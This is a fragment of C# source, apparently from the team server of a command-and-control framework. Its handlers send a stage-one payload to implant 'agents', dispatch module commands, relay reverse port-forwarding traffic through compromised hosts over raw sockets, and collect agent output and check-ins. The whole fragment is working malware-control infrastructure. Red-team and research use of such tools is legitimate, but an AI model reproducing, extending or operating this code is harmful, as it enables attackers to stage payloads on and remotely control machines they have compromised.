private void HandleStageOneRequest(AgentMetadata metadata, C2Data c2Data) { var stage = PayloadControllerBase.GenerateStageOne(new StageRequest { TargetFramework = TargetFramework.Net40 }); Agent.SendDataToAgent(metadata.AgentID, "", "StageOne", stage); }
private void HandleC2Data(AgentMetadata metadata, C2Data c2Data) { OnServerCommand CallBack; try { CallBack = ServerModules .Where(m => m.Name.Equals(c2Data.Module, StringComparison.OrdinalIgnoreCase)) .Select(m => m.ServerCommands).FirstOrDefault() .Where(c => c.Name.Equals(c2Data.Command, StringComparison.OrdinalIgnoreCase)) .Select(c => c.CallBack).FirstOrDefault(); } catch { return; } CallBack?.Invoke(metadata, c2Data); }
private void DataFromAgent(AgentMetadata metadata, C2Data c2Data) { var packet = Serialisation.DeserialiseData <ReversePortForwardPacket>(c2Data.Data); if (!IPAddress.TryParse(packet.ForwardHost, out IPAddress ipAddress)) { ipAddress = Dns.GetHostEntry(packet.ForwardHost).AddressList[0]; } var endPoint = new IPEndPoint(ipAddress, packet.ForwardPort); var sender = new Socket(ipAddress.AddressFamily, SocketType.Stream, ProtocolType.IP); sender.Connect(endPoint); var bytesSent = sender.Send(packet.Data); if (bytesSent > 0) { Log.Logger.Information("MODULE {ModuleName} {Data}", "ReversePortForward", $"{bytesSent} bytes sent"); } var buffer = new byte[65535]; var bytesRecv = sender.Receive(buffer); if (bytesRecv > 0) { packet.Data = buffer.TrimBytes(); Agent.SendAgentCommand(new AgentCommandRequest { AgentId = c2Data.AgentID, Module = "rportfwd", Command = "DataFromTeamServer", Data = Convert.ToBase64String(Serialisation.SerialiseData(packet)) }, null); } sender.Shutdown(SocketShutdown.Both); sender.Close(); }
private void RegisterAgentModule(AgentMetadata metadata, C2Data c2Data) { var moduleInfo = Serialisation.DeserialiseData <AgentModule>(c2Data.Data); Agent.RegisterAgentModule(metadata, moduleInfo); }
private void HandleAgentError(AgentMetadata metadata, C2Data c2Data) { var error = Encoding.UTF8.GetString(c2Data.Data); OnAgentEvent?.Invoke(this, new AgentEvent(metadata.AgentID, AgentEventType.AgentError, error)); }
private void HandleAgentOutput(AgentMetadata metadata, C2Data c2Data) { var output = Encoding.UTF8.GetString(c2Data.Data); OnAgentEvent?.Invoke(this, new AgentEvent(metadata.AgentID, AgentEventType.CommandResponse, output)); }
private void HandleAgentCheckin(AgentMetadata metadata, C2Data c2Data) { Agent.UpdateSession(metadata); }